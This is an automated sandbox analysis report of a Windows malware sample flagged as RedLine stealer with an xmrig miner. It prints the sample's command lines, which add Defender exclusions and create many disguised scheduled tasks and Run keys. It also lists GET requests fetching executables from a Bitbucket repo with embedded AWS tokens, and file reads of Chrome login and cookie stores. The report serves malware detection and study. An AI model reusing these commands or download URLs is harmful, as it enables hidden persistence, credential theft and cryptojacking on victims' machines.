Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Feb. 21, 2023, 1:27 p.m. | Feb. 21, 2023, 1:33 p.m. |
- cmd.exe "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" (PID 2276)
  - chcp.com chcp 1251 (PID 1700)
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" (PID 1692)
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" (PID 2616)
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" (PID 2676)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 204)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 1168)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 1096)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 1212)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 948)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2172)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2812)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2184)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2040)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2844)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2680)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 1956)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2800)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2004)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2684)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2108)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 1532)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2492)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2808)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 1372)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2912)
- cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2764)
  - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" (PID 2496)
- chcp.com chcp 1251 (PID 2672)
Name | Response | Post-Analysis Lookup |
---|---|---|
bitbucket.org | 104.192.141.1 | |
bbuseruploads.s3.amazonaws.com | CNAME s3-1-w.amazonaws.com; 52.217.206.129 | |
transfer.sh | 144.76.136.153 | |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49170 52.216.212.249:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49209 104.192.141.1:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49169 104.192.141.1:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49181 104.192.141.1:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49182 54.231.132.1:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49210 52.217.40.228:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/rpoverka/zhopa/downloads/MainModule.exe |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237 |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379 |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428 |
request | GET https://bitbucket.org/rpoverka/zhopa/downloads/MainModule.exe |
request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237 |
request | GET https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe |
request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379 |
request | GET https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe |
request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\update.exe |
file | C:\ProgramData\Dllhost\dllhost.exe |
file | C:\ProgramData\Dllhost\winlogson.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
file | C:\Users\test22\AppData\Local\Temp\update.exe |
file | C:\Users\test22\AppData\Local\Temp\update.exe |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | Checks if being debugged | rule | anti_dbg |
description | Bypass DEP | rule | disable_dep |
description | RedLine stealer | rule | RedLine_Stealer_m_Zero |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | chcp 1251 |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
host | 168.119.228.126 |
description | dllhost.exe tried to sleep 2728168 seconds, actually delayed analysis time by 2728168 seconds |
description | update.exe tried to sleep 2728288 seconds, actually delayed analysis time by 2728288 seconds |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dllhost | reg_value | C:\ProgramData\Dllhost\dllhost.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray | reg_value | C:\Windows\System32\SecurityHealthSystray.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender | reg_value | C:\Program Files\Windows Defender\MpCmdRun.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Cortana | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe\Cortana.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE | reg_value | C:\Windows\System32\wbem\WmiPrvSE.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable | reg_value | C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\NvStray | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
